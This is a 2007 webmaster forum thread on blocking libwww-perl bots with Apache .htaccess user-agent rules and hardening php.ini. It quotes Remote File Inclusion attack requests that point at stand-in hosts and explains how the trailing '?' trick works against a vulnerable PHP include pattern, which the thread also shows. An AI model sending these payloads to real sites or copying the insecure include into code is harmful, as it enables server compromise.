Forum Moderators: phranque
I have what looks like a perl bot trying to hack into my sites.
I'm running a 1.? version of Apache on a Red Hat LAMP system.
I've been told that all I have to do is change something called a "User-Agent" in my .htaccess file - I'm unable to locate that file on my box.
Can anyone help me figure this out. I'm getting hit daily with this guy.
More likely, they are using libwww-perl to download your pages -- probably to extract snippets for inclusion on yet another useless made-for-Adsense "directory" site.
An .htaccess file may be located in any directory of your site, but the most usual and convenient place to put one is in the Web root (home page) directory. On some servers, it is there but not visible unless you set up your FTP client to show it by using "ls -al" instead of "ls" for the "show directory listing" command in FTP.
Since FTP clients vary, the method for making this change also varies, but is is a common feature of FTP clients.
However, it is a very good idea to make sure that if there is an existing .htaccess file, that you can see it, because you should edit the one that is there rather than replacing it. Some functions of your site may depend on what is already in that .htaccess file, even if it's "invisible."
If you don't have an .htaccess file, you can create one and upload it. On Windows machines, it's not possible to create a file called just ".htaccess" -- The OS will complain that "You must enter a filename" because it sees the ".htaccess" as a file with an extension of ".htaccess", but no filename. Also, it won't know what program to use to open that kind of file.
So the usual approach is to just give it a name and a common text-file extension, and call it something like "my.htaccess.txt" or something. This prevents the "You must enter a filename" problem, and marks the file as a plain-text file, which is what you want.
Then, you'll need to add some directives in that file to block the libwww-perl user-agent. This is typically done using mod_rewrite, but if your server doesn't support that, there is another way. Here's the mod_rewrite code to block libwww-perl:
Options +FollowSymLinks
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule .* - [F]
Options +FollowSymLinks
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteCond %{REQUEST_URI} !^/path-to-your-custom-403-error-page\.html$
RewriteRule .* - [F]
With the second code snippet, the libwww-perl user-agent can see only the contents of your custom 403-Forbidden error page. If you use such a custom error page, then you must use this code and adjust the path to your custom 403 error document so it can be accessed.
Having created and edited your my.htaccess.txt file, upload it to your server and then rename it to .htaccess. If it "disappears" then that is the problem mentioned above -- It is there, but your FTP client won't show it.
If your .htaccess file causes a problem on your server, simply upload a blank .htaccess file to replace the broken one.
For more information, see the documents cited in our forum charter [webmasterworld.com] and the tutorials in the Apache forum section of the WebmasterWorld library [webmasterworld.com].
Jim
That's so cool. So, will I see the 403 message come up on my apache logs the next time the www-pearl bot tries to access it?
Also, once I've uploaded the .htaccess file, is it a good idea to restart apache?
So, to be certain, I create the .htaccess file (with the proper code snippets) and upload it to the root level of that particular website?
I have a few websites hosted. Should I put one in the root level of each site directory (/var/www/html/mysite1/.htaccess), or is it best to put it in the directory that contains all my websites (/var/www/html/.htaccess)?
# deny based on User-Agent
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bots
deny from env=block_bad_bots
It says: if the User-Agent string contains libwww-perl, set the environment variable block_bad_bots. The final line says if any of the bad bots were matched, deny the request.
(I added another bot to show how to add more.)
This just uses a different Apache feature to do the same thing.
-----------
Personally, I'd give each website its own .htaccess, but I'm only guessing. The top-level master .htaccess is called httpd.conf, and the code could probably go there, to apply to all your sites. With any such change, be sure to test it as best you can, or at least watch closely at first to make sure it's working. I think there's a Firefox add-on that allows specifying its User-Agent string, if you want to test explicitly.
You don't need to restart Apache. .htaccess is read every time a file is requested from the server.
------------
I get a lot of these requests from libwww-perl user-agents:
GET /index.php?inc=hxxp://hackersite.com/hacktext.txt?
and even
GET /index.html?inc=hxxp://hackersite.com/hacktext.txt?
These are Remote File Inclusion attacks, and they are very dangerous.
Blocking libwww-perl turns away a lot of them.
Using these in php.ini is another layer of defense:
register_globals = Off
allow_url_fopen = Off
[edited by: SteveWh at 5:04 am (utc) on Sep. 12, 2007]
Would you know what specific script it is that is referred to here as "index.php" and accepts "inc=" as a named variable to be "included"?
If your script doesn't expect and accept that named variable, and include the URL named as the value, then the request should be quite harmless. So what script(s) are they after?
Jim
The "?inc=" is because so many people use it as a variable name that it has a high probability of success.
The final "?" at the end of the query string is important. If the php script does something like
include("{$_GET['inc']}.inc");
which is supposed to append a file extension, the trailing "?" in the exploit turns everything that follows it into a query string, thus short-circuiting the intended build of the filename and leaving the hacker's injected text as a valid filename for inclusion from the remote site.
The hacker text can be a shell script like r57 or c99, or it can be a fairly simple php script that iterates all index.* files in a website and injects <iframe> code into the pages. This iframe exploit appears to be prevalent at this time.
Many people do not have secure php.ini settings.
Why can these iframes be dangerous? Try these articles:
[isc.sans.org...]
[isc.sans.org...] (Follow all the links at the bottom of the page.)
libwww-perl surely must have legitimate uses, and some mostly harmless ones, but if it's doing things like "?inc=" or "?root_path=", it's trying to do bad things.
libwww-perl, like Indy Library and many others, is just a collection of scripted functions. These libraries can be used for good or for ill.
Jim
There are often multiple ways to do the same thing, so here's an alternative, also for .htaccess:# deny based on User-Agent
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bots
deny from env=block_bad_botsIt says: if the User-Agent string contains libwww-perl, set the environment variable block_bad_bots. The final line says if any of the bad bots were matched, deny the request.
(I added another bot to show how to add more.)
This just uses a different Apache feature to do the same thing.
Steve,
Just a heads up for others.
This is a bit redundant?
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
when;
SetEnvIfNoCase User-Agent libwww block_bad_bots
or
SetEnvIfNoCase User-Agent perl block_bad_bots
(IF the UA contains "libwww" or the second example "perl"; both not required; block_bad_bots)
would work just as well. KISS!
So the take-home lesson here is to avoid using common variable names in query strings, and to use local file includes as opposed to HTTP URL GETs.
I forgot to mention that include("{$_GET['inc']}.inc"); is flawed to start with. It should be handled using an array or switch statement so that the file to be included is drawn from a static list of legal possibilities, not blindly taken from the $_GET variable's value.
wilderness, I expect you're right. I'm weak on regexes, and used an explicit form that I knew I understood (safest that way). Apparently the form you used in your example does mean "contains".
If I understand that right, an equality test (in general, but not appropriate for this particular use) would be:
^libwww-perl$
What I'm keying off of is that it isn't a file include, it's a URL include, which is both wasteful of time and resources, and dramatically opens the scope for abuse! The script should be written to access only local files using local file reads, not HTTP GETs.
Unbelievable how many programmers make such 'small' but catastrophic mistakes!
Jim
[edited by: jdMorgan at 10:23 pm (utc) on Sep. 12, 2007]
Your 2d example of:
^libwww-perl$
applies both "begins with" and "ends with" to the phrase (UA).
The same thing may simply be accommplised (as I previously did),
or,
in instances where non-traditional characters (possibly the hyphen in this instance) requiring use of escaping with the backslash, rather just enclosing the entire phrase/UA in quotes and omitting the begins and ends with (or even including the begins and ends with outside of the quotes (again redunancy).
The key with these lines is in utilizing short phrases that catch many words in any of the options ("begins with", "ends with" or "contains").
One good example is the number of old harvesters that began with the word "web".
Many folks would have 10-15 lines of words that began with "web" when the entire 10-15 lines could have been replaced with a single line.
BTW, I'm not much on the complicated rewrites that Jim and many others use including wildcards and such.
Even though those extensive options exist with rewrites, another person could likely come along and accomplish similar writes with the simpliest of understanding.
The more consistent one becomes in their creation of rewrites, the easier it becomes to locate syntax errors (which everybody will have sooner or later).
I'd surely "throw in the towel" were I required to sift through about 300 lines of the very, very long rewrites that I have seen used here.
Don
# deny based on User-Agent
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bots
deny from env=block_bad_bots
I'll keep an eye on my logs and echo the results.
Stay tuned!
Well, I checked my logs this mornign to find this
77.235.43.91 - - [13/Sep/2007:04:37:33 -0400] "GET /barebonz/index.php?menu=http://www.example.com/what_foo/safe.txt? HTTP/1.1" 200 45183 "-" "libwww-perl/5.808"
Looks like the .htaccess file didn't work. Am I missing something?
[edited by: jdMorgan at 5:05 am (utc) on Feb. 21, 2008]
[edit reason] examplified domain and user for security. [/edit]
I'd suggest:
# Deny based on User-Agent
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "psycheclone" bad_bot
#
# Allow universal access to robots.txt and custom 403 error page
SetEnvIf Request_URI "robots\.txt$" allow_all
SetEnvIf Request_URI "custom-403-page\.html$" allow_all
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot
Jim
KISS.
Keep it simple and stupid!
See my intial reply in this thread.
In addition your htaccess may be missing some leading and ending lines of data that is a necessary part of your hosts requirements in order to make the file function.
In the event this is your first attempt at htaccess?
What did your old and default htaccess contain?
Determine this, then make the additions accordingly.
Jim's reply a few seconds before mine ;)
What I'm keying off of is that it isn't a file include, it's a URL include, which is both wasteful of time and resources, and dramatically opens the scope for abuse! The script should be written to access only local files using local file reads, not HTTP GETs.
wilderness,
Yes I agree with trying to catch as many as possible with a single line. Yes there are many examples online with multiple lines that could be combined into one.
The .* just means zero or more occurrences of any characters, so ^.* means "starting at the beginning, zero or more characters followed by libwww-perl", so it means "contains", just like yours. However, as soon as I'm done here, I'm going to change my code to use your syntax after I have gone to a good regular expressions reference site to make sure I understand it completely and understand why I should not be using double quotes around the whole expression. The Apache site itself has examples using the quotes and other similar examples without them, with no explanation. I do believe your code is more correct, but I want to understand why.
In my own code, I do use a shorter form like libwww instead of libwww-perl.
pugg09,
1. Are you hosting this site on your own computer or at a webhost? When you said "I'm unable to locate that file on my box.", I got the impression you're hosting it yourself. If you are hosting it yourself, you need to understand .htaccess like an expert, so go to the Apache site and study, study, study.
2. The code block I posted is working for me (giving 403's), but as noted above, I'm going to switch to what wilderness uses.
3. If you are at a webhost, your .htaccess file must be in public_html to successfully apply to the whole site. That is, the file must be public_html/.htaccess. If you are hosting the site at home, it should be in the site's top-level folder, whatever its name is. It might be necessary for you to modify your httpd.conf file so that .htaccess is enabled.
4. The most likely reason the code is not working for you is what jdMorgan said: other Allow, Deny, or Order directives in the file. See [httpd.apache.org...] As both jdMorgan and wilderness said, how you do this depends on what's already in your .htaccess. If there's nothing there already, it's simple. If there's stuff already there, it can get complicated. If there was nothing there previously, then your .htaccess might be disabled; see #3 above.
5. The line with psycheclone was just an example of how to add more. psycheclone only sucks bandwidth. It's not a hacker. You can omit the line.
6. The log entry you posted above is exactly the type of injection attack I was talking about. If you get that file from that site (with your Antivirus/antispyware/firewall all on high-alert), you'll probably find it is a very nasty PHP script, which your AV might flag as a virus. Be careful.
As with all code snippets provided on any BBS, the purpose is to lead you in the direction of a solution and provide keywords to help you with web searching. It is assumed that you will investigate and read relevant articles in order to understand a method before you implement it.
[edited by: SteveWh at 8:46 pm (utc) on Sep. 13, 2007]
wilderness,Yes I agree with trying to catch as many as possible with a single line. Yes there are many examples online with multiple lines that could be combined into one.
The .* just means zero or more occurrences of any characters, so ^.* means "starting at the beginning, zero or more characters followed by libwww-perl", so it means "contains", just like yours. However, as soon as I'm done here, I'm going to change my code to use your syntax after I have gone to a good regular expressions reference site to make sure I understand it completely and understand why I should not be using double quotes around the whole expression. I do believe your code is more correct, but I want to understand why.
In my own code, I do use a shorter form like libwww instead of libwww-perl.
Steve,
If your review the Apache code for rewrites you will see that it specifies using quotes on every single line.
However. . . that is incorrect!
It may be the Apache suggested order, however the use remains reduntant and not necessary with only a solitary exception.
That exception is to use quotes as block to "exactly as" (additionally could be contains, begins with or ends with) in which we are NOT required to use the escape (backslash) for special characters, ONLY when utilizing the quotes.
Of a current 1,700 line htacess (with notation of condensed and combining of lines) that has been for nearly seve years, I have less than a handful of lines that use quotes in the rewrites.
These exceptions were utilized only when other methods failed (please don't ask for examples of failure). ;)
Don
You posted links to two good regex sites in a previous thread. I found those more useful than the one I was using, and bookmarked them. But no place has been much use about the quotes. Except for your one exception (being able to specify special chars without escaping them), it looks like the quotes are really just to help Apache determine the correct argument boundaries, so it doesn't think there are 5 arguments when you intended 4.
please don't ask for examples of failure
Don
Thank you everyone for your incredibly valuable input.
Yes, I'm hosting this on a machine of my own.
A quick find (find / .htaccess ¦ grep .htaccess) produced no results, even when I logged in as root. So, if I do have another .htaccess, how would I know?
My .htaccess file that I created was placed on the root level of my site (var/www/html/mysite1/.htaccess).
I'm not using Apached 2.? - so, to study study study, where would I even start. Could you post a few decent links, so that I'm not wasting time while hackers are injecting their perl scripts?
Thanks again.
Pugg09
# Deny based on User-Agent
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "psycheclone" bad_bot
#
# Allow universal access to robots.txt and custom 403 error page
SetEnvIf Request_URI "robots\.txt$" allow_all
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot
...we'll see what the logs say in the morning.
...stay tuned for episode 2 of the Apache Newbie vs the Curse of the Black Perl
mod_access [httpd.apache.org]
mod_rewrite [httpd.apache.org]
mod_setenvif [httpd.apache.org]
I'm not sure if you meant you're "not" using Apache 2.x, or you're "now" using Apache 2.x, but the 1.3 docs will serve well for a start and Apache 2.x is backwards-compatible to Apache 1.3x.
Jim
Wow, I really opened up a hornet's nest, didn't I?
No nest.
As Steve, Jim and myself explained (and others are aware) in Rewrites there are many ways to "skin a cat".
All we've really been disccusing are some minor clarifications that will make proof reading in the event that syntax errors occurr, easier to read in larger htaccess files.
Knowing that you're hosting on your own computer and presumably in Linux, I think I can clarify some things better. I'll try to be "descriptive" rather than "absolute" about file locations.
.htaccess in Linux is a hidden system file. I don't know if grep will have access to it.
It goes in the same folder as your home page (your top level index.html, index.htm, or index.php).
If you didn't have an .htaccess file at all in that location, before you started this thread, then these new lines will be the only contents in it. If that's the case, try the following lines. If your .htaccess is enabled, these should work:
SetEnvIfNoCase User-Agent libwww-perl bad_bots
order deny,allow
deny from env=bad_bots
If they don't work, I'm guessing it's because your httpd.conf file has settings that disable the use of .htaccess. Beyond this point, my knowledge is very shaky.
First, to find httpd.conf, go to wherever Apache is installed. It should have a subfolder called conf, where there is a text file httpd.conf. Open it for editing.
For some background, see [webmasterworld.com...]
Now also see [httpd.apache.org...] . Where it refers to "your main server configuration", it means "httpd.conf". There is some troubleshooting at the bottom of the page.
That page also says that it's best to put configuration code of this type (like the SetEnvIf) in httpd.conf if you possibly can. However, from the context of the article, I think what they mean is that it's best not to give that much power to your end-users (like if you're a hosting company). So for now, try to get .htaccess working. You can always move the code into httpd.conf later, but as you'll see, that is a very complex and intimidating file to try to work with.
There are some settings in it that are very different depending on whether you are just setting up a test box (like my WAMP) where security isn't an issue, or a production box like yours where the most secure settings possible are of utmost importance.
Evidently the setting to enable .htaccess is AllowOverride, which appears in several locations in the file. On your box, it will be ok to set AllowOverride to All (because you're not concerned with giving power to "end users"), but I don't know in which of the AllowOverride locations you do this, and I am now at the absolute limit of my knowledge. :) But this will hopefully give you some keywords with which to search in the Apache docs for a better answer.
The php.ini file that I referred to earlier is also very important, but it's a whole 'nuther can of worms. To get you started, the file is in your LAMP, in the /php folder (PHP's top level folder). Whatever else is there, just make sure it has in it the two lines:
register_globals = Off
allow_url_fopen = Off
Also, make sure you have complete backup copies of all your sites on CD/DVD. If you don't, do it now. Hosting your own site is very risky unless you are an expert. The chances that someone will get in are high, and it is always possible that at some point you might have to reformat, reinstall O/S, and restore everything from backups.
wilderness,
I went back to the full libwww-perl line after discovering log entries from Lynx (presumably the text browser) that have a User-Agent of libwww-FM.
From what little reading I've done - it appears that in the httpd.conf I can use a "<Directory>" tag to set the allow/deny values of a directory that Apache knows. So, after backing up my original httpd.conf, I created the following entry into my httpd.conf file as follows:
<Directory "/var/www/html/mysite1">
SetEnvIfNoCase User-Agent libwww-perl bad_bots
order deny,allow
deny from env=bad_bots
</Directory>
I then ran the following to restart my apache deamon:
./apachectl graceful
I'll let this run overnight again, and check my logs in the morning.
Stayed tuned for episode 3 of "The Curse of the Black Perl"
PS. Have any of you noticed how many sites are hosting malicious perl scripts? Every single one in my logs came from a legitamate business site. Some of them where sitting in /image files, disguised as icon or some other type of harmless file.
I checked my logs this morning and I just wanted to share two numbers with all of you who helped me.
The numbers are: 403 and 404!
Woo hoo!
It looks like the <Directory> and the php.ini fixed the security hole.
After checking all my other sites, it looks like everything is working great.
A "BIG", "HUGE", "ENORMOUS" THANK YOU to all of you.
Don't you just love it when good triumphs over evil. This has definitaly been an experience I will not soon forget.
Thanks again guys. I'm now off to the bookstore to pick up way too many texts on Apache.
Here's a log snippet
index.php?menu=http://biancaa1990.example.com/script9.txt? HTTP/1.1" 200 45043 "-" "Mozilla/3.0 (compatible; Indy Library)"
I was able to block PERL bots, but how would I thwart this dude who's actually using a legit browser?
Thanks in advance.
[edited by: jdMorgan at 5:02 am (utc) on Feb. 21, 2008]
[edit reason] examplified injected link for security. [/edit]